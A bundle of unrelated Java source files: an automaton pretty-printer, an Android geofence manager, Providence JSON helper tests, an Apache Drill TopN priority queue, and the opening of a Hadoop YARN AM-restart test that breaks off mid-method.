import java.io.*;
import java.util.Arrays;
import java.util.HashSet;
import wyautl.core.*;
/**
* <p>
* Responsible for writing an automaton in a textual format to an output stream.
* Obviously, it cannot know how to handle the supplementary data that can be
* provided as part of a state. Therefore, if the automaton contains states
* which have supplementary data, the client is expected to deal with this.
* </p>
* <p>
* <b>NOTE:</b> By default, this class completely ignores any supplementary
* data. To allow writing this data, the client should extend this class and
* overwrite the method <code>write(Automata.State)</code>. In such case, it is
* recommended that <code>super.write(state)</code> is called before writing the
* supplementary data. In other words, the standard information (i.e. kind and
* children) for a state comes first, and the supplementary data is placed after
* that.
* </p>
*
* @author David J. Pearce
*
*/
public class PrettyAutomataWriter {
private final PrintWriter writer;
private final Schema schema;
private final HashSet<String> indents;
private int level;
private boolean indices;
public PrettyAutomataWriter(PrintStream stream, Schema schema, String... indents) {
this(new PrintWriter(stream),schema,indents);
}
public PrettyAutomataWriter(OutputStream stream, Schema schema, String... indents) {
this(new OutputStreamWriter(stream),schema,indents);
}
public PrettyAutomataWriter(PrintWriter stream, Schema schema, String... indents) {
this.writer = stream;
this.schema = schema;
this.indents = new HashSet<String>();
for(String indent : indents) {
this.indents.add(indent);
}
}
public PrettyAutomataWriter(Writer stream, Schema schema, String... indents) {
this.writer = new PrintWriter(stream);
this.schema = schema;
this.indents = new HashSet<String>();
for(String indent : indents) {
this.indents.add(indent);
}
}
public void setIndices(boolean flag) {
indices = flag;
}
public void write(Automaton automaton) throws IOException {
int[] headers = new int[automaton.nStates()];
for (int i = 0; i != automaton.nRoots(); ++i) {
Arrays.fill(headers, 0);
int root = automaton.getRoot(i);
Automata.traverse(automaton, root, headers);
write(root, headers, automaton, false);
}
writer.flush();
}
public void write(int root, Automaton automaton) throws IOException {
int[] headers = new int[automaton.nStates()];
Arrays.fill(headers, 0);
Automata.traverse(automaton, root, headers);
write(root, headers, automaton, false);
writer.flush();
}
protected void write(int index, int[] headers, Automaton automaton,
boolean indent) throws IOException {
int header = 0;
if(index >= 0) {
header = headers[index];
if(header == 3) {
writer.print("$" + index + "<");
headers[index] = -1; // mark the header
} else if(header < 0) {
writer.print("$" + index);
return;
}
}
Automaton.State state = automaton.get(index);
if (state instanceof Automaton.Constant) {
write((Automaton.Constant) state, headers, automaton, indent);
} else if (state instanceof Automaton.Term) {
if(indices) {
writer.print(index + ":");
}
write((Automaton.Term) state, headers, automaton, indent);
} else {
write((Automaton.Collection) state, headers, automaton, indent);
}
if(header == 3) {
writer.print(">");
}
}
protected void write(Automaton.Constant item, int[] headers, Automaton automaton, boolean indent) throws IOException {
Object payload = item.value;
if (payload instanceof String) {
writer.print("\"" + payload.toString() + "\"");
} else {
// default
writer.print(payload.toString());
}
}
protected void write(Automaton.Term term, int[] headers, Automaton automaton,
boolean indent) throws IOException {
String name = schema.get(term.kind).name;
indent = indents.contains(name);
writer.print(name);
Schema.State element = schema.get(term.kind).child;
if (element != null && element instanceof Schema.Collection) {
write(term.contents, headers, automaton, indent);
} else if (element != null) {
writer.print("(");
write(term.contents, headers, automaton, indent);
writer.print(")");
}
}
protected void write(Automaton.Collection state, int[] headers, Automaton automaton, boolean indent) throws IOException {
switch(state.kind) {
case Automaton.K_LIST:
writer.print("[");
break;
case Automaton.K_BAG:
writer.print("{|");
break;
case Automaton.K_SET:
writer.print("{");
break;
}
if(indent) {
level++;
}
for(int i=0;i!=state.size();++i) {
if(i != 0) {
writer.print(",");
}
if(indent) {
writer.println();
indent();
}
write(state.get(i),headers,automaton,false);
}
if(indent) {
level--;
writer.println();
indent();
}
switch(state.kind) {
case Automaton.K_LIST:
writer.print("]");
break;
case Automaton.K_BAG:
writer.print("|}");
break;
case Automaton.K_SET:
writer.print("}");
break;
}
}
public void close() throws IOException {
writer.close();
}
public void flush() throws IOException {
writer.flush();
}
private void indent() {
for(int i=0;i<level;++i) {
writer.print("\t");
}
}
}
|
|
package com.sousoum.jcvd;
import android.content.Context;
import android.support.annotation.NonNull;
import android.support.annotation.Nullable;
import android.support.annotation.VisibleForTesting;
import android.util.Log;
import com.google.android.gms.common.api.ResultCallback;
import com.google.android.gms.common.api.Status;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.Set;
/**
* Class that manages addition and deletion of Fences in the Google API Client.
* It uses a store to remember all fences that are currently in the Google API Client.
* The store is currently backed by the shared preferences
*/
public class StorableFenceManager {
/**
* Informs about fence addition or removal status
*/
public interface Listener {
/**
* Called when a fence has been, successfully or not, added to the Google API Client
* @param fence the fence that has been added
* @param status the status of the operation
*/
void fenceAddStatus(StorableFence fence, Status status);
/**
* Called when a fence has been, successfully or not, removed from the Google API Client
* @param fenceId the id of the fence that has been removed
* @param status the status of the operation
*/
void fenceRemoveStatus(String fenceId, Status status);
}
private static final String TAG = "FenceManager";
private static final String TO_ADD_STORE = "TO_ADD_STORE";
private static final String TO_REMOVE_STORE = "TO_REMOVE_STORE";
private static final String SYNCED_STORE = "SYNCED_STORE";
private final Context mContext;
private Listener mListener;
@VisibleForTesting
final FenceStore mToAddStore; // store of the fence to add to the Google API Client
@VisibleForTesting
final FenceStore mToRemoveStore; // store of the fence to remove from the Google API Client
@VisibleForTesting
final FenceStore mSyncedStore; // store that represent which fences are in the Google API Client
private final GapiFenceManager mGapiFenceManager;
/**
* Constructor.
*
* @param context a context
*/
public StorableFenceManager(Context context) {
mContext = context;
mToAddStore = new FenceStore(context, TO_ADD_STORE);
mToRemoveStore = new FenceStore(context, TO_REMOVE_STORE);
mSyncedStore = new FenceStore(context, SYNCED_STORE);
mGapiFenceManager = createGapiFenceManager();
synchronizeNonCommittedFencesToGoogleApi();
}
@VisibleForTesting
protected GapiFenceManager createGapiFenceManager() {
return new GapiFenceManager(mContext);
}
/**
* Set the listener. This listener will be informed when the fences are modified in the google api client
* @param listener a listener
*/
public void setListener(Listener listener) {
mListener = listener;
}
/**
* Get the current listener
* @return the current listener
*/
public Listener getListener() {
return mListener;
}
/**
* Add a fence to the store
* This will also add the fence to the google api client if connected. If not, it will trigger a connection
* This call requires that the following granted permissions:
* - ACCESS_FINE_LOCATION if one of the fence is a {@link StorableLocationFence}
* - ACTIVITY_RECOGNITION if one of the fence is a {@link StorableActivityFence}
* @param id the unique id of the fence. You will be able to get the fence with this id.
* @param storableFence the fence to store
* @param pendingIntentClassName the class name of the pending intent to call when the fence will be valid.
*/
public void addFence(@NonNull String id, @NonNull StorableFence storableFence,
@NonNull String pendingIntentClassName) {
addFence(id, storableFence, null, pendingIntentClassName);
}
/**
* Add a fence to the store
* This will also add the fence to the google api client if connected. If not, it will trigger a connection
* This call requires that the following granted permissions:
* - ACCESS_FINE_LOCATION if one of the fence is a {@link StorableLocationFence}
* - ACTIVITY_RECOGNITION if one of the fence is a {@link StorableActivityFence}
* @param id the unique id of the fence. You will be able to get the fence with this id.
* @param storableFence the fence to store
* @param additionalData a hash map associated with this fence. Can be null.
* @param pendingIntentClassName the class name of the pending intent to call when the fence will be valid.
*/
public void addFence(@NonNull String id, @NonNull StorableFence storableFence,
@Nullable HashMap<String, Object> additionalData,
@NonNull String pendingIntentClassName) {
storableFence.setId(id);
storableFence.setAdditionalData(additionalData);
storableFence.setPendingIntentClass(pendingIntentClassName);
mToAddStore.storeFence(storableFence);
FenceAddStatus addStatus = new FenceAddStatus(storableFence);
mGapiFenceManager.addFence(id, storableFence.getAwarenessFence(mContext),
pendingIntentClassName, addStatus);
}
/**
* Ask to remove a fence from the store.
* If the Google API Client is not connected, trigger a connection
* Else, remove from the Google API client. It will be removed from store if the operation is successful
* @param fenceId The id of the fence to remove
*/
public void removeFence(@NonNull String fenceId) {
mToRemoveStore.storeFenceId(fenceId);
FenceRemoveStatus removeStatus = new FenceRemoveStatus(fenceId);
mGapiFenceManager.removeFence(fenceId, removeStatus);
}
/**
* Resynchronize all fences to the Google API Client.
* This means that the already stored fences will be re-submitted and that the
* {@link StorableFenceManager#synchronizeNonCommittedFencesToGoogleApi()} function will be
* called.
*/
@VisibleForTesting(otherwise=VisibleForTesting.PACKAGE_PRIVATE)
public void synchronizeAllToGoogleApi() {
Log.i(TAG, "Resynchronize all fences");
// first, add all (already) stored fences, without listener
ArrayList<StorableFence> storedFences = mSyncedStore.getAllFences();
if (!storedFences.isEmpty()) {
// for each fence, add it to the Google API Client
for (StorableFence storableFence : storedFences) {
if ((storableFence.getId() != null) &&
(storableFence.getPendingIntentClass() != null)) {
mGapiFenceManager.addFence(storableFence.getId(), storableFence.getAwarenessFence(mContext),
storableFence.getPendingIntentClass(), null);
}
Log.i(TAG, "Added " + storableFence);
}
Log.i(TAG, "All already stored fences have been submitted to be synchronized with Google API Client");
}
// then synchronize non-committed fences
synchronizeNonCommittedFencesToGoogleApi();
}
/**
* Ask to synchronize all non committed changes to the Google API Client
* (i.e. add the fences that are in the toAddStore and remove the fences that are in the
* toRemoveStore)
*/
private void synchronizeNonCommittedFencesToGoogleApi() {
Log.i(TAG, "Synchronize non-commited fences");
// add all fences from the to add list
ArrayList<StorableFence> toAddFences = mToAddStore.getAllFences();
if (!toAddFences.isEmpty()) {
// for each fence, add it to the Google API Client
for (StorableFence storableFence : toAddFences) {
FenceAddStatus addStatus = new FenceAddStatus(storableFence);
if ((storableFence.getId() != null) &&
(storableFence.getPendingIntentClass() != null)) {
mGapiFenceManager.addFence(storableFence.getId(), storableFence.getAwarenessFence(mContext),
storableFence.getPendingIntentClass(), addStatus);
}
Log.i(TAG, "Added " + storableFence);
}
Log.i(TAG, "All fences to add have been submitted to be synchronized with Google API Client");
}
// remove all fences from the to remove list
Set<String> toRemoveFences = mToRemoveStore.getAllFenceIds();
if (!toRemoveFences.isEmpty()) {
// TODO: use only one request!
// for each fence, remove it to the Google API Client
for (String fenceId : toRemoveFences) {
FenceRemoveStatus removeStatus = new FenceRemoveStatus(fenceId);
mGapiFenceManager.removeFence(fenceId, removeStatus);
Log.i(TAG, "Removed " + fenceId);
}
Log.i(TAG, "All fences to remove have been submitted to be synchronized with Google API Client");
}
}
/**
* Get all stored fences that are synced with Google API Client.
* @return a list of StorableFence (can not be null)
*/
public @NonNull
ArrayList<StorableFence> getAllFences() {
return mSyncedStore.getAllFences();
}
/**
* Get a stored fence which is synced with Google API Client.
* @param id the id of the searched fence
* @return a StorableFence that matches the given id
*/
public StorableFence getFence(String id) {
StorableFence storableFence = null;
if (id != null) {
ArrayList<StorableFence> allGeo = getAllFences();
for (StorableFence currentFence : allGeo) {
if (currentFence.getId() != null && currentFence.getId().equals(id)) {
storableFence = currentFence;
break;
}
}
}
return storableFence;
}
//region Result callbacks
private class FenceRemoveStatus implements ResultCallback<Status> {
/**
* Inner class that will responds to ResultCallback when a fence will be, successfully or not, removed from the Google API Client
*/
private final String mFenceId;
public FenceRemoveStatus(@NonNull String fenceId) {
mFenceId = fenceId;
}
@Override
public void onResult(@NonNull Status status) {
if (status.isSuccess()) {
Log.i(TAG, "Removed successfully fence " + mFenceId + " to the Google API");
// since the operation is successful, remove from the local store
mSyncedStore.removeFence(mFenceId);
mToRemoveStore.removeFence(mFenceId);
} else {
Log.e(TAG, "Error : fence not removed. Error is " + status.getStatusMessage() + "(code : " + status.getStatusCode() + ")");
}
if (mListener != null) {
mListener.fenceRemoveStatus(mFenceId, status);
}
}
}
private class FenceAddStatus implements ResultCallback<Status> {
/**
* Inner class that will responds to ResultCallback when a fence will be, successfully or not, added to the Google API Client
*/
private final StorableFence mFence;
public FenceAddStatus(@NonNull StorableFence fence) {
mFence = fence;
}
@Override
public void onResult(@NonNull Status status) {
if (status.isSuccess()) {
Log.i(TAG, "Added successfully fence " + mFence + " to the Google API");
// since the operation is successful, remove from the local store
mSyncedStore.storeFence(mFence);
// id could not be null here as we have added the fence to the store
assert mFence.getId() != null;
mToAddStore.removeFence(mFence.getId());
} else {
Log.e(TAG, "Error : fence not added. Error is " + status.getStatusMessage() + "(code : " + status.getStatusCode() + ")");
}
if (mListener != null) {
mListener.fenceAddStatus(mFence, status);
}
}
}
//endregion Result callbacks
}
|
|
package net.morimekta.providence.util;
import net.morimekta.test.providence.core.CompactFields;
import net.morimekta.test.providence.core.Containers;
import net.morimekta.test.providence.core.DefaultFields;
import net.morimekta.test.providence.core.OptionalFields;
import net.morimekta.test.providence.core.calculator.Operand;
import net.morimekta.test.providence.core.calculator.Operation;
import net.morimekta.test.providence.core.calculator.Operator;
import net.morimekta.test.providence.core.number.Imaginary;
import net.morimekta.util.Binary;
import org.junit.Before;
import org.junit.Test;
import java.io.IOException;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationTargetException;
import java.util.List;
import static net.morimekta.providence.util.ProvidenceHelper.debugString;
import static net.morimekta.providence.util.ProvidenceHelper.getTargetModifications;
import static org.hamcrest.CoreMatchers.hasItems;
import static org.hamcrest.CoreMatchers.instanceOf;
import static org.hamcrest.CoreMatchers.is;
import static org.hamcrest.Matchers.hasSize;
import static org.hamcrest.collection.IsEmptyCollection.empty;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertThat;
/**
* Tests for reading json resources.
*/
public class ProvidenceHelperTest {
@Test
public void testGetTargetModifications() {
OptionalFields._Builder b1 = getTargetModifications(OptionalFields.builder().build(),
OptionalFields.builder().build());
assertThat(b1.modifiedFields(), is(empty()));
OptionalFields source = OptionalFields.builder()
.setBinaryValue(Binary.fromBase64("abcd"))
.setStringValue("old")
.setIntegerValue(321)
.build();
OptionalFields target = OptionalFields.builder()
.setStringValue("new")
.setLongValue(1234L)
.setIntegerValue(321)
.build();
OptionalFields._Builder b2 = getTargetModifications(source, target);
assertThat(b2.modifiedFields(), hasItems(OptionalFields._Field.BINARY_VALUE,
OptionalFields._Field.STRING_VALUE,
OptionalFields._Field.LONG_VALUE));
assertThat(b2.modifiedFields(), hasSize(3));
assertThat(b2.build(), is(target));
}
@Test
public void testFromJsonResource_compact() throws IOException {
Operation op = net.morimekta.providence.util.ProvidenceHelper.fromJsonResource("/json/calculator/compact.json", Operation.kDescriptor);
Operation expected = Operation.builder()
.setOperator(Operator.MULTIPLY)
.addToOperands(Operand.builder()
.setOperation(Operation.builder()
.setOperator(Operator.ADD)
.addToOperands(Operand.builder()
.setNumber(1234)
.build())
.addToOperands(Operand.builder()
.setNumber(
4.321)
.build())
.build())
.build())
.addToOperands(Operand.builder()
.setImaginary(Imaginary.builder()
.setV(1.7)
.setI(-2.0)
.build())
.build())
.build();
assertEquals(op, expected);
}
@Test
public void testFromJsonResource_named() throws IOException {
Operation op = net.morimekta.providence.util.ProvidenceHelper.fromJsonResource("/json/calculator/named.json", Operation.kDescriptor);
Operation expected = Operation.builder()
.setOperator(Operator.MULTIPLY)
.addToOperands(Operand.builder()
.setOperation(Operation.builder()
.setOperator(Operator.ADD)
.addToOperands(Operand.builder()
.setNumber(1234)
.build())
.addToOperands(Operand.builder()
.setNumber(
4.321)
.build())
.build())
.build())
.addToOperands(Operand.builder()
.setImaginary(Imaginary.builder()
.setV(1.7)
.setI(-2.0)
.build())
.build())
.build();
assertEquals(op, expected);
}
@Test
public void testFromJsonResource_pretty() throws IOException {
Operation op = net.morimekta.providence.util.ProvidenceHelper.fromJsonResource("/json/calculator/pretty.json", Operation.kDescriptor);
Operation expected = Operation.builder()
.setOperator(Operator.MULTIPLY)
.addToOperands(Operand.builder()
.setOperation(Operation.builder()
.setOperator(Operator.ADD)
.addToOperands(Operand.builder()
.setNumber(1234)
.build())
.addToOperands(Operand.builder()
.setNumber(
4.321)
.build())
.build())
.build())
.addToOperands(Operand.builder()
.setImaginary(Imaginary.builder()
.setV(1.7)
.setI(-2.0)
.build())
.build())
.build();
assertEquals(op, expected);
}
@Test
public void testArrayListFromJsonResource() throws IOException {
List<Containers> pretty = net.morimekta.providence.util.ProvidenceHelper.arrayListFromJsonResource("/compat/pretty.json",
Containers.kDescriptor);
List<Containers> compact = net.morimekta.providence.util.ProvidenceHelper.arrayListFromJsonResource("/compat/compact.json",
Containers.kDescriptor);
assertEquals(10, pretty.size());
assertEquals(pretty.size(), compact.size());
for (int i = 0; i < 10; ++i) {
assertEquals(debugString(compact.get(i)), debugString(pretty.get(i)));
}
}
private Operation mOperation;
@Before
public void setUp() {
mOperation = Operation.builder()
.setOperator(Operator.MULTIPLY)
.addToOperands(Operand.builder()
.setOperation(Operation.builder()
.setOperator(Operator.ADD)
.addToOperands(Operand.builder()
.setNumber(1234)
.build())
.addToOperands(Operand.builder()
.setNumber(4.321)
.build())
.build())
.build())
.addToOperands(Operand.builder()
.setImaginary(Imaginary.builder()
.setV(1.7)
.setI(-2.0)
.build())
.build())
.build();
}
@Test
public void testDebugString() {
assertEquals("{\n" +
" operator = MULTIPLY\n" +
" operands = [\n" +
" {\n" +
" operation = {\n" +
" operator = ADD\n" +
" operands = [\n" +
" {\n" +
" number = 1234\n" +
" },\n" +
" {\n" +
" number = 4.321\n" +
" }\n" +
" ]\n" +
" }\n" +
" },\n" +
" {\n" +
" imaginary = {\n" +
" v = 1.7\n" +
" i = -2\n" +
" }\n" +
" }\n" +
" ]\n" +
"}", ProvidenceHelper.debugString(mOperation));
}
@Test
public void testParseDebugString() {
assertEquals(mOperation, ProvidenceHelper.parseDebugString(
"{\n" +
" operator = MULTIPLY\n" +
" operands = [\n" +
" {\n" +
" operation = {\n" +
" operator = ADD\n" +
" operands = [\n" +
" {\n" +
" number = 1234\n" +
" },\n" +
" {\n" +
" number = 4.321\n" +
" }\n" +
" ]\n" +
" }\n" +
" },\n" +
" {\n" +
" imaginary = {\n" +
" v = 1.7\n" +
" i = -2\n" +
" }\n" +
" }\n" +
" ]\n" +
"}", Operation.kDescriptor));
}
@Test
public void testOptionalInMessage() {
DefaultFields defaultFields = DefaultFields
.builder()
.setCompactValue(CompactFields.builder()
.setId(1234)
.setLabel("bar")
.build())
.build();
String label = ProvidenceHelper
.<String>optionalInMessage(defaultFields,
DefaultFields._Field.COMPACT_VALUE,
CompactFields._Field.LABEL).orElseThrow(() -> new AssertionError(
"No label"));
assertThat(label, is("bar"));
}
@Test
public void testConstructor()
throws NoSuchMethodException, IllegalAccessException, InvocationTargetException, InstantiationException {
Constructor<ProvidenceHelper> constructor = ProvidenceHelper.class.getDeclaredConstructor();
assertThat(constructor.isAccessible(), is(false));
try {
constructor.setAccessible(true);
assertThat(constructor.newInstance(), is(instanceOf(ProvidenceHelper.class)));
} finally {
constructor.setAccessible(false);
}
}
}
|
|
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.drill.exec.physical.impl.TopN;
import io.netty.buffer.DrillBuf;
import java.util.concurrent.TimeUnit;
import javax.inject.Named;
import org.apache.drill.exec.exception.SchemaChangeException;
import org.apache.drill.exec.memory.BufferAllocator;
import org.apache.drill.exec.ops.FragmentContext;
import org.apache.drill.exec.physical.impl.sort.RecordBatchData;
import org.apache.drill.exec.record.BatchSchema;
import org.apache.drill.exec.record.ExpandableHyperContainer;
import org.apache.drill.exec.record.MaterializedField;
import org.apache.drill.exec.record.RecordBatch;
import org.apache.drill.exec.record.VectorContainer;
import org.apache.drill.exec.record.selection.SelectionVector2;
import org.apache.drill.exec.record.selection.SelectionVector4;
import com.google.common.base.Stopwatch;
public abstract class PriorityQueueTemplate implements PriorityQueue {
private static final org.slf4j.Logger logger = org.slf4j.LoggerFactory.getLogger(PriorityQueueTemplate.class);
private SelectionVector4 heapSv4; //This holds the heap
private SelectionVector4 finalSv4; //This is for final sorted output
private ExpandableHyperContainer hyperBatch;
private FragmentContext context;
private BufferAllocator allocator;
private int limit;
private int queueSize = 0;
private int batchCount = 0;
private boolean hasSv2;
@Override
public void init(int limit, FragmentContext context, BufferAllocator allocator, boolean hasSv2) throws SchemaChangeException {
this.limit = limit;
this.context = context;
this.allocator = allocator;
final DrillBuf drillBuf = allocator.buffer(4 * (limit + 1));
heapSv4 = new SelectionVector4(drillBuf, limit, Character.MAX_VALUE);
this.hasSv2 = hasSv2;
}
@Override
public void resetQueue(VectorContainer container, SelectionVector4 v4) throws SchemaChangeException {
assert container.getSchema().getSelectionVectorMode() == BatchSchema.SelectionVectorMode.FOUR_BYTE;
BatchSchema schema = container.getSchema();
VectorContainer newContainer = new VectorContainer();
for (MaterializedField field : schema) {
int[] ids = container.getValueVectorId(field.getPath()).getFieldIds();
newContainer.add(container.getValueAccessorById(field.getValueClass(), ids).getValueVectors());
}
newContainer.buildSchema(BatchSchema.SelectionVectorMode.FOUR_BYTE);
hyperBatch = new ExpandableHyperContainer(newContainer);
batchCount = hyperBatch.iterator().next().getValueVectors().length;
final DrillBuf drillBuf = allocator.buffer(4 * (limit + 1));
heapSv4 = new SelectionVector4(drillBuf, limit, Character.MAX_VALUE);
for (int i = 0; i < v4.getTotalCount(); i++) {
heapSv4.set(i, v4.get(i));
}
v4.clear();
doSetup(context, hyperBatch, null);
}
@Override
public void add(FragmentContext context, RecordBatchData batch) throws SchemaChangeException{
Stopwatch watch = new Stopwatch();
watch.start();
if (hyperBatch == null) {
hyperBatch = new ExpandableHyperContainer(batch.getContainer());
} else {
hyperBatch.addBatch(batch.getContainer());
}
doSetup(context, hyperBatch, null); // may not need to do this every time
int count = 0;
SelectionVector2 sv2 = null;
if (hasSv2) {
sv2 = batch.getSv2();
}
for (; queueSize < limit && count < batch.getRecordCount(); count++) {
heapSv4.set(queueSize, batchCount, hasSv2 ? sv2.getIndex(count) : count);
queueSize++;
siftUp();
}
for (; count < batch.getRecordCount(); count++) {
heapSv4.set(limit, batchCount, hasSv2 ? sv2.getIndex(count) : count);
if (compare(limit, 0) < 0) {
swap(limit, 0);
siftDown();
}
}
batchCount++;
if (hasSv2) {
sv2.clear();
}
logger.debug("Took {} us to add {} records", watch.elapsed(TimeUnit.MICROSECONDS), count);
}
@Override
public void generate() throws SchemaChangeException {
Stopwatch watch = new Stopwatch();
watch.start();
final DrillBuf drillBuf = allocator.buffer(4 * queueSize);
finalSv4 = new SelectionVector4(drillBuf, queueSize, 4000);
for (int i = queueSize - 1; i >= 0; i--) {
finalSv4.set(i, pop());
}
logger.debug("Took {} us to generate output of {}", watch.elapsed(TimeUnit.MICROSECONDS), finalSv4.getTotalCount());
}
@Override
public VectorContainer getHyperBatch() {
return hyperBatch;
}
@Override
public SelectionVector4 getHeapSv4() {
return heapSv4;
}
@Override
public SelectionVector4 getFinalSv4() {
return finalSv4;
}
@Override
public void cleanup() {
heapSv4.clear();
hyperBatch.clear();
}
private void siftUp() {
int p = queueSize - 1;
while (p > 0) {
if (compare(p, (p - 1) / 2) > 0) {
swap(p, (p - 1) / 2);
p = (p - 1) / 2;
} else {
break;
}
}
}
private void siftDown() {
int p = 0;
int next;
while (p * 2 + 1 < queueSize) {
if (p * 2 + 2 >= queueSize) {
next = p * 2 + 1;
} else {
if (compare(p * 2 + 1, p * 2 + 2) >= 0) {
next = p * 2 + 1;
} else {
next = p * 2 + 2;
}
}
if (compare(p, next) < 0) {
swap(p, next);
p = next;
} else {
break;
}
}
}
public int pop() {
int value = heapSv4.get(0);
swap(0, queueSize - 1);
queueSize--;
siftDown();
return value;
}
public void swap(int sv0, int sv1) {
int tmp = heapSv4.get(sv0);
heapSv4.set(sv0, heapSv4.get(sv1));
heapSv4.set(sv1, tmp);
}
public int compare(int leftIndex, int rightIndex) {
int sv1 = heapSv4.get(leftIndex);
int sv2 = heapSv4.get(rightIndex);
return doEval(sv1, sv2);
}
public abstract void doSetup(@Named("context") FragmentContext context, @Named("incoming") VectorContainer incoming, @Named("outgoing") RecordBatch outgoing);
public abstract int doEval(@Named("leftIndex") int leftIndex, @Named("rightIndex") int rightIndex);
}
|
|
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.yarn.server.resourcemanager.applicationsmanager;
import java.util.ArrayList;
import java.util.Collections;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import org.apache.hadoop.yarn.api.protocolrecords.AllocateResponse;
import org.apache.hadoop.yarn.api.protocolrecords.RegisterApplicationMasterResponse;
import org.apache.hadoop.yarn.api.records.ApplicationAccessType;
import org.apache.hadoop.yarn.api.records.ApplicationAttemptId;
import org.apache.hadoop.yarn.api.records.ApplicationId;
import org.apache.hadoop.yarn.api.records.Container;
import org.apache.hadoop.yarn.api.records.ContainerExitStatus;
import org.apache.hadoop.yarn.api.records.ContainerId;
import org.apache.hadoop.yarn.api.records.ContainerState;
import org.apache.hadoop.yarn.api.records.ContainerStatus;
import org.apache.hadoop.yarn.api.records.NMToken;
import org.apache.hadoop.yarn.api.records.ResourceRequest;
import org.apache.hadoop.yarn.conf.YarnConfiguration;
import org.apache.hadoop.yarn.server.api.protocolrecords.NMContainerStatus;
import org.apache.hadoop.yarn.server.resourcemanager.MockAM;
import org.apache.hadoop.yarn.server.resourcemanager.MockNM;
import org.apache.hadoop.yarn.server.resourcemanager.MockRM;
import org.apache.hadoop.yarn.server.resourcemanager.recovery.MemoryRMStateStore;
import org.apache.hadoop.yarn.server.resourcemanager.recovery.records.ApplicationStateData;
import org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMApp;
import org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl;
import org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppState;
import org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttempt;
import org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl;
import org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptState;
import org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerState;
import org.apache.hadoop.yarn.server.resourcemanager.scheduler.AbstractYarnScheduler;
import org.apache.hadoop.yarn.server.resourcemanager.scheduler.ResourceScheduler;
import org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerApplicationAttempt;
import org.apache.hadoop.yarn.server.resourcemanager.scheduler.capacity.CapacityScheduler;
import org.apache.hadoop.yarn.util.ControlledClock;
import org.apache.hadoop.yarn.util.Records;
import org.apache.hadoop.yarn.util.SystemClock;
import org.junit.Assert;
import org.junit.Test;
public class TestAMRestart {
@Test(timeout = 30000)
public void testAMRestartWithExistingContainers() throws Exception {
YarnConfiguration conf = new YarnConfiguration();
conf.setInt(YarnConfiguration.RM_AM_MAX_ATTEMPTS, 2);
MockRM rm1 = new MockRM(conf);
rm1.start();
RMApp app1 =
rm1.submitApp(200, "name", "user",
new HashMap<ApplicationAccessType, String>(), false, "default", -1,
null, "MAPREDUCE", false, true);
MockNM nm1 =
new MockNM("127.0.0.1:1234", 10240, rm1.getResourceTrackerService());
nm1.registerNode();
MockNM nm2 =
new MockNM("127.0.0.1:2351", 4089, rm1.getResourceTrackerService());
nm2.registerNode();
MockAM am1 = MockRM.launchAndRegisterAM(app1, rm1, nm1);
int NUM_CONTAINERS = 3;
// allocate NUM_CONTAINERS containers
am1.allocate("127.0.0.1", 1024, NUM_CONTAINERS,
new ArrayList<ContainerId>());
nm1.nodeHeartbeat(true);
// wait for containers to be allocated.
List<Container> containers =
am1.allocate(new ArrayList<ResourceRequest>(),
new ArrayList<ContainerId>()).getAllocatedContainers();
while (containers.size() != NUM_CONTAINERS) {
nm1.nodeHeartbeat(true);
containers.addAll(am1.allocate(new ArrayList<ResourceRequest>(),
new ArrayList<ContainerId>()).getAllocatedContainers());
Thread.sleep(200);
}
// launch the 2nd container, for testing running container transferred.
nm1.nodeHeartbeat(am1.getApplicationAttemptId(), 2, ContainerState.RUNNING);
ContainerId containerId2 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 2);
rm1.waitForState(nm1, containerId2, RMContainerState.RUNNING);
// launch the 3rd container, for testing container allocated by previous
// attempt is completed by the next new attempt/
nm1.nodeHeartbeat(am1.getApplicationAttemptId(), 3, ContainerState.RUNNING);
ContainerId containerId3 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 3);
rm1.waitForState(nm1, containerId3, RMContainerState.RUNNING);
// 4th container still in AQUIRED state. for testing Acquired container is
// always killed.
ContainerId containerId4 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 4);
rm1.waitForState(nm1, containerId4, RMContainerState.ACQUIRED);
// 5th container is in Allocated state. for testing allocated container is
// always killed.
am1.allocate("127.0.0.1", 1024, 1, new ArrayList<ContainerId>());
nm1.nodeHeartbeat(true);
ContainerId containerId5 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 5);
rm1.waitForContainerAllocated(nm1, containerId5);
rm1.waitForState(nm1, containerId5, RMContainerState.ALLOCATED);
// 6th container is in Reserved state.
am1.allocate("127.0.0.1", 6000, 1, new ArrayList<ContainerId>());
ContainerId containerId6 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 6);
nm1.nodeHeartbeat(true);
SchedulerApplicationAttempt schedulerAttempt =
((AbstractYarnScheduler) rm1.getResourceScheduler())
.getCurrentAttemptForContainer(containerId6);
